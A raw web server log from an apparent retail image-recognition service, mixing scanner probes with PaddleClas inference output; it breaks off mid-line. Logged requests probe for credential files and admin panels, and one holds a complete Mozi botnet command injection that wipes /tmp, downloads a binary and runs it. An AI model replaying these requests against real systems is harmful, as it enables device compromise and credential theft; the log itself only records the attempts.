19148|app: 0|req: 1727/2006] 81.16.255.42 () {32 vars in 462 bytes} [Sun Feb 20 01:54:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1728/2007] 176.107.188.190 () {36 vars in 466 bytes} [Sun Feb 20 02:55:31 2022] GET /.aws/credentials => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1729/2008] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 20 03:10:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1730/2009] 101.133.136.70 () {22 vars in 235 bytes} [Sun Feb 20 03:20:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 123/2010] 101.133.136.70 () {22 vars in 297 bytes} [Sun Feb 20 03:20:43 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1731/2011] 101.133.136.70 () {22 vars in 239 bytes} [Sun Feb 20 03:20:49 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1732/2012] 101.133.136.70 () {22 vars in 238 bytes} [Sun Feb 20 03:20:51 2022] OPTIONS / => generated 179 bytes in 2 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 59/2013] 101.133.136.70 () {40 vars in 483 bytes} [Sun Feb 20 03:20:51 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1733/2014] 18.237.51.91 () {30 vars in 456 bytes} [Sun Feb 20 03:41:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1734/2015] 45.180.170.221 () {32 vars in 464 bytes} [Sun Feb 20 05:20:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1735/2016] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 20 05:28:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1736/2017] 81.17.24.154 () {40 vars in 627 bytes} [Sun Feb 20 05:31:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1737/2018] 154.209.125.39 () {34 vars in 459 bytes} [Sun Feb 20 07:10:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1738/2019] 192.241.205.177 () {34 vars in 395 bytes} [Sun Feb 20 07:30:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1739/2020] 183.136.115.159 () {30 vars in 438 bytes} [Sun Feb 20 07:34:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1740/2021] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 20 09:22:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1741/2022] 65.49.20.69 () {28 vars in 305 bytes} [Sun Feb 20 09:46:05 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1742/2023] 47.104.136.57 () {36 vars in 458 bytes} [Sun Feb 20 09:46:59 2022] GET /pmd/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 124/2024] 101.133.148.169 () {32 vars in 504 bytes} [Sun Feb 20 09:47:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1743/2025] 193.118.53.202 () {34 vars in 488 bytes} [Sun Feb 20 09:51:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1744/2026] 34.140.248.32 () {42 vars in 564 bytes} [Sun Feb 20 09:55:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1745/2027] 212.120.209.44 () {32 vars in 464 bytes} [Sun Feb 20 10:38:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1746/2028] 141.8.79.77 () {28 vars in 304 bytes} [Sun Feb 20 11:26:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1747/2029] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 20 11:35:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1748/2030] 81.17.24.154 () {40 vars in 627 bytes} [Sun Feb 20 12:02:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1749/2031] 109.72.243.104 () {32 vars in 465 bytes} [Sun Feb 20 15:13:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1750/2032] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 20 15:49:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1751/2033] 81.17.24.154 () {40 vars in 627 bytes} [Sun Feb 20 16:31:59 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1752/2034] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 20 17:12:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1753/2035] 120.85.116.194 () {34 vars in 642 bytes} [Sun Feb 20 18:10:19 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1754/2036] 164.90.197.30 () {36 vars in 481 bytes} [Sun Feb 20 18:15:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1755/2037] 128.14.134.170 () {34 vars in 488 bytes} [Sun Feb 20 19:31:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1756/2038] 164.92.201.252 () {22 vars in 233 bytes} [Sun Feb 20 19:42:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1757/2039] 62.171.149.200 () {40 vars in 672 bytes} [Sun Feb 20 20:12:36 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1758/2040] 47.102.98.20 () {40 vars in 605 bytes} [Sun Feb 20 20:20:10 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1759/2041] 47.102.98.20 () {38 vars in 598 bytes} [Sun Feb 20 20:20:10 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1760/2042] 151.243.110.168 () {36 vars in 523 bytes} [Sun Feb 20 21:05:28 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1761/2043] 192.241.196.173 () {34 vars in 429 bytes} [Sun Feb 20 21:14:59 2022] GET /manager/text/list => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1762/2044] 141.101.229.61 () {32 vars in 464 bytes} [Sun Feb 20 21:36:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1763/2045] 20.55.53.144 () {34 vars in 495 bytes} [Sun Feb 20 21:57:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1764/2046] 185.245.62.226 () {28 vars in 311 bytes} [Sun Feb 20 22:00:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1765/2047] 185.245.62.226 () {40 vars in 671 bytes} [Sun Feb 20 22:00:11 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1766/2048] 83.97.20.34 () {30 vars in 329 bytes} [Sun Feb 20 22:10:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1767/2049] 209.17.96.106 () {30 vars in 410 bytes} [Sun Feb 20 22:40:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1768/2050] 83.97.20.34 () {26 vars in 287 bytes} [Sun Feb 20 23:12:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1769/2051] 45.134.144.134 () {32 vars in 437 bytes} [Sun Feb 20 23:27:47 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1770/2052] 106.12.3.163 () {32 vars in 397 bytes} [Sun Feb 20 23:48:03 2022] GET /users/sign_in => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1771/2053] 20.151.201.9 () {36 vars in 499 bytes} [Mon Feb 21 00:02:05 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1772/2054] 192.241.213.83 () {34 vars in 418 bytes} [Mon Feb 21 00:15:45 2022] GET /manager/html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1773/2055] 47.101.130.170 () {34 vars in 432 bytes} [Mon Feb 21 00:35:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1774/2056] 193.118.53.202 () {34 vars in 488 bytes} [Mon Feb 21 00:37:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1775/2057] 164.90.201.191 () {32 vars in 440 bytes} [Mon Feb 21 00:54:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1776/2058] 189.127.145.212 () {32 vars in 465 bytes} [Mon Feb 21 01:05:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1777/2059] 199.168.97.179 () {32 vars in 391 bytes} [Mon Feb 21 01:06:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1778/2060] 101.133.136.70 () {22 vars in 235 bytes} [Mon Feb 21 01:24:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1779/2061] 101.133.136.70 () {22 vars in 297 bytes} [Mon Feb 21 01:24:24 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1780/2062] 101.133.136.70 () {22 vars in 238 bytes} [Mon Feb 21 01:24:32 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1781/2063] 101.133.136.70 () {22 vars in 239 bytes} [Mon Feb 21 01:24:36 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1782/2064] 101.133.136.70 () {40 vars in 485 bytes} [Mon Feb 21 01:24:40 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1783/2065] 47.92.6.234 () {34 vars in 457 bytes} [Mon Feb 21 01:34:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1784/2066] 178.93.10.105 () {32 vars in 470 bytes} [Mon Feb 21 01:56:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1785/2067] 45.87.63.11 () {36 vars in 537 bytes} [Mon Feb 21 02:41:11 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1786/2068] 54.190.35.204 () {34 vars in 499 bytes} [Mon Feb 21 02:47:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1787/2069] 83.97.20.34 () {30 vars in 329 bytes} [Mon Feb 21 02:58:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-02-21 03:07:07 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:07:07 INFO: DetPostProcess : +2022-02-21 03:07:07 INFO: DetPreProcess : +2022-02-21 03:07:07 INFO: transform_ops : +2022-02-21 03:07:07 INFO: DetResize : +2022-02-21 03:07:07 INFO: interp : 2 +2022-02-21 03:07:07 INFO: keep_ratio : False +2022-02-21 03:07:07 INFO: target_size : [640, 640] +2022-02-21 03:07:07 INFO: DetNormalizeImage : +2022-02-21 03:07:07 INFO: is_scale : True +2022-02-21 03:07:07 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:07:07 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:07:07 INFO: DetPermute : +2022-02-21 03:07:07 INFO: Global : +2022-02-21 03:07:07 INFO: batch_size : 1 +2022-02-21 03:07:07 INFO: cpu_num_threads : 1 +2022-02-21 03:07:07 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:07:07 INFO: enable_benchmark : True +2022-02-21 03:07:07 INFO: enable_mkldnn : True +2022-02-21 03:07:07 INFO: enable_profile : False +2022-02-21 03:07:07 INFO: gpu_mem : 8000 +2022-02-21 03:07:07 INFO: image_shape : [3, 640, 640] +2022-02-21 03:07:07 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:07:07 INFO: ir_optim : True +2022-02-21 03:07:07 INFO: labe_list : ['foreground'] +2022-02-21 03:07:07 INFO: max_det_results : 5 +2022-02-21 03:07:07 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:07:07 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:07:07 INFO: threshold : 0.2 +2022-02-21 03:07:07 INFO: use_fp16 : False +2022-02-21 03:07:07 INFO: use_gpu : False +2022-02-21 03:07:07 INFO: use_tensorrt : False +2022-02-21 03:07:07 INFO: IndexProcess : +2022-02-21 03:07:07 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:07:07 INFO: return_k : 5 +2022-02-21 03:07:07 INFO: score_thres : 0.5 +2022-02-21 03:07:07 INFO: RecPostProcess : None +2022-02-21 03:07:07 INFO: RecPreProcess : +2022-02-21 03:07:07 INFO: transform_ops : +2022-02-21 03:07:07 INFO: ResizeImage : +2022-02-21 03:07:07 INFO: size : 224 +2022-02-21 03:07:07 INFO: NormalizeImage : +2022-02-21 03:07:07 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:07:07 INFO: order : +2022-02-21 03:07:07 INFO: scale : 0.00392157 +2022-02-21 03:07:07 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:07:07 INFO: ToCHWImage : None +Inference: 377.2568702697754 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1788/2070] 171.43.147.19 () {32 vars in 419 bytes} [Mon Feb 21 03:07:06 2022] POST /reference_client/ => generated 98 bytes in 3001 msecs (HTTP/1.1 200) 5 headers in 157 bytes (14 switches on core 0) +req +2022-02-21 03:07:38 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:07:38 INFO: DetPostProcess : +2022-02-21 03:07:38 INFO: DetPreProcess : +2022-02-21 03:07:38 INFO: transform_ops : +2022-02-21 03:07:38 INFO: DetResize : +2022-02-21 03:07:38 INFO: interp : 2 +2022-02-21 03:07:38 INFO: keep_ratio : False +2022-02-21 03:07:38 INFO: target_size : [640, 640] +2022-02-21 03:07:38 INFO: DetNormalizeImage : +2022-02-21 03:07:38 INFO: is_scale : True +2022-02-21 03:07:38 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:07:38 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:07:38 INFO: DetPermute : +2022-02-21 03:07:38 INFO: Global : +2022-02-21 03:07:38 INFO: batch_size : 1 +2022-02-21 03:07:38 INFO: cpu_num_threads : 1 +2022-02-21 03:07:38 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:07:38 INFO: enable_benchmark : True +2022-02-21 03:07:38 INFO: enable_mkldnn : True +2022-02-21 03:07:38 INFO: enable_profile : False +2022-02-21 03:07:38 INFO: gpu_mem : 8000 +2022-02-21 03:07:38 INFO: image_shape : [3, 640, 640] +2022-02-21 03:07:38 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:07:38 INFO: ir_optim : True +2022-02-21 03:07:38 INFO: labe_list : ['foreground'] +2022-02-21 03:07:38 INFO: max_det_results : 5 +2022-02-21 03:07:38 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:07:38 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:07:38 INFO: threshold : 0.2 +2022-02-21 03:07:38 INFO: use_fp16 : False +2022-02-21 03:07:38 INFO: use_gpu : False +2022-02-21 03:07:38 INFO: use_tensorrt : False +2022-02-21 03:07:38 INFO: IndexProcess : +2022-02-21 03:07:38 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:07:38 INFO: return_k : 5 +2022-02-21 03:07:38 INFO: score_thres : 0.5 +2022-02-21 03:07:38 INFO: RecPostProcess : None +2022-02-21 03:07:38 INFO: RecPreProcess : +2022-02-21 03:07:38 INFO: transform_ops : +2022-02-21 03:07:38 INFO: ResizeImage : +2022-02-21 03:07:38 INFO: size : 224 +2022-02-21 03:07:38 INFO: NormalizeImage : +2022-02-21 03:07:38 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:07:38 INFO: order : +2022-02-21 03:07:38 INFO: scale : 0.00392157 +2022-02-21 03:07:38 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:07:38 INFO: ToCHWImage : None +Inference: 373.80099296569824 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19147|app: 0|req: 125/2071] 171.43.147.19 () {32 vars in 420 bytes} [Mon Feb 21 03:07:37 2022] POST /reference_client/ => generated 98 bytes in 2966 msecs (HTTP/1.1 200) 5 headers in 157 bytes (18 switches on core 0) +req +2022-02-21 03:08:54 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:08:54 INFO: DetPostProcess : +2022-02-21 03:08:54 INFO: DetPreProcess : +2022-02-21 03:08:54 INFO: transform_ops : +2022-02-21 03:08:54 INFO: DetResize : +2022-02-21 03:08:54 INFO: interp : 2 +2022-02-21 03:08:54 INFO: keep_ratio : False +2022-02-21 03:08:54 INFO: target_size : [640, 640] +2022-02-21 03:08:54 INFO: DetNormalizeImage : +2022-02-21 03:08:54 INFO: is_scale : True +2022-02-21 03:08:54 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:08:54 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:08:54 INFO: DetPermute : +2022-02-21 03:08:54 INFO: Global : +2022-02-21 03:08:54 INFO: batch_size : 1 +2022-02-21 03:08:54 INFO: cpu_num_threads : 1 +2022-02-21 03:08:54 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:08:54 INFO: enable_benchmark : True +2022-02-21 03:08:54 INFO: enable_mkldnn : True +2022-02-21 03:08:54 INFO: enable_profile : False +2022-02-21 03:08:54 INFO: gpu_mem : 8000 +2022-02-21 03:08:54 INFO: image_shape : [3, 640, 640] +2022-02-21 03:08:54 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:08:54 INFO: ir_optim : True +2022-02-21 03:08:54 INFO: labe_list : ['foreground'] +2022-02-21 03:08:54 INFO: max_det_results : 5 +2022-02-21 03:08:54 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:08:54 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:08:54 INFO: threshold : 0.2 +2022-02-21 03:08:54 INFO: use_fp16 : False +2022-02-21 03:08:54 INFO: use_gpu : False +2022-02-21 03:08:54 INFO: use_tensorrt : False +2022-02-21 03:08:54 INFO: IndexProcess : +2022-02-21 03:08:54 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:08:54 INFO: return_k : 5 +2022-02-21 03:08:54 INFO: score_thres : 0.5 +2022-02-21 03:08:54 INFO: RecPostProcess : None +2022-02-21 03:08:54 INFO: RecPreProcess : +2022-02-21 03:08:54 INFO: transform_ops : +2022-02-21 03:08:54 INFO: ResizeImage : +2022-02-21 03:08:54 INFO: size : 224 +2022-02-21 03:08:54 INFO: NormalizeImage : +2022-02-21 03:08:54 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:08:54 INFO: order : +2022-02-21 03:08:54 INFO: scale : 0.00392157 +2022-02-21 03:08:54 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:08:54 INFO: ToCHWImage : None +Inference: 374.9117851257324 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1789/2072] 171.43.147.19 () {32 vars in 420 bytes} [Mon Feb 21 03:08:52 2022] POST /reference_client/ => generated 98 bytes in 2981 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) +req +2022-02-21 03:16:28 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:16:28 INFO: DetPostProcess : +2022-02-21 03:16:28 INFO: DetPreProcess : +2022-02-21 03:16:28 INFO: transform_ops : +2022-02-21 03:16:28 INFO: DetResize : +2022-02-21 03:16:28 INFO: interp : 2 +2022-02-21 03:16:28 INFO: keep_ratio : False +2022-02-21 03:16:28 INFO: target_size : [640, 640] +2022-02-21 03:16:28 INFO: DetNormalizeImage : +2022-02-21 03:16:28 INFO: is_scale : True +2022-02-21 03:16:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:16:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:16:28 INFO: DetPermute : +2022-02-21 03:16:28 INFO: Global : +2022-02-21 03:16:28 INFO: batch_size : 1 +2022-02-21 03:16:28 INFO: cpu_num_threads : 1 +2022-02-21 03:16:28 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-21 03:16:28 INFO: enable_benchmark : True +2022-02-21 03:16:28 INFO: enable_mkldnn : True +2022-02-21 03:16:28 INFO: enable_profile : False +2022-02-21 03:16:28 INFO: gpu_mem : 8000 +2022-02-21 03:16:28 INFO: image_shape : [3, 640, 640] +2022-02-21 03:16:28 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-21 03:16:28 INFO: ir_optim : True +2022-02-21 03:16:28 INFO: labe_list : ['foreground'] +2022-02-21 03:16:28 INFO: max_det_results : 5 +2022-02-21 03:16:28 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-21 03:16:28 INFO: rec_nms_thresold : 0.05 +2022-02-21 03:16:28 INFO: threshold : 0.2 +2022-02-21 03:16:28 INFO: use_fp16 : False +2022-02-21 03:16:28 INFO: use_gpu : False +2022-02-21 03:16:28 INFO: use_tensorrt : False +2022-02-21 03:16:28 INFO: IndexProcess : +2022-02-21 03:16:28 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-21 03:16:28 INFO: return_k : 5 +2022-02-21 03:16:28 INFO: score_thres : 0.5 +2022-02-21 03:16:28 INFO: RecPostProcess : None +2022-02-21 03:16:28 INFO: RecPreProcess : +2022-02-21 03:16:28 INFO: transform_ops : +2022-02-21 03:16:28 INFO: ResizeImage : +2022-02-21 03:16:28 INFO: size : 224 +2022-02-21 03:16:28 INFO: NormalizeImage : +2022-02-21 03:16:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:16:28 INFO: order : +2022-02-21 03:16:28 INFO: scale : 0.00392157 +2022-02-21 03:16:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:16:28 INFO: ToCHWImage : None +Inference: 374.9380111694336 ms per batch image +[] +234 +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1790/2073] 171.43.147.19 () {32 vars in 419 bytes} [Mon Feb 21 03:16:27 2022] POST /reference_client/ => generated 98 bytes in 3006 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) +req +2022-02-21 03:16:34 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-21 03:16:34 INFO: DetPostProcess : +2022-02-21 03:16:34 INFO: DetPreProcess : +2022-02-21 03:16:34 INFO: transform_ops : +2022-02-21 03:16:34 INFO: DetResize : +2022-02-21 03:16:34 INFO: interp : 2 +2022-02-21 03:16:34 INFO: keep_ratio : False +2022-02-21 03:16:34 INFO: target_size : [640, 640] +2022-02-21 03:16:34 INFO: DetNormalizeImage : +2022-02-21 03:16:34 INFO: is_scale : True +2022-02-21 03:16:34 INFO: mean : [0.485, 0.456, 0.406] +2022-02-21 03:16:34 INFO: std : [0.229, 0.224, 0.225] +2022-02-21 03:16:34 INFO: DetPermute : +2022-02-21 03:16:34 INFO: Global : +2022-02-21 03:16:34 INFO: batch_size : 1 +2022-02-21 03:16:34 INFO: cpu_num_threads : 1 +2022-02-21 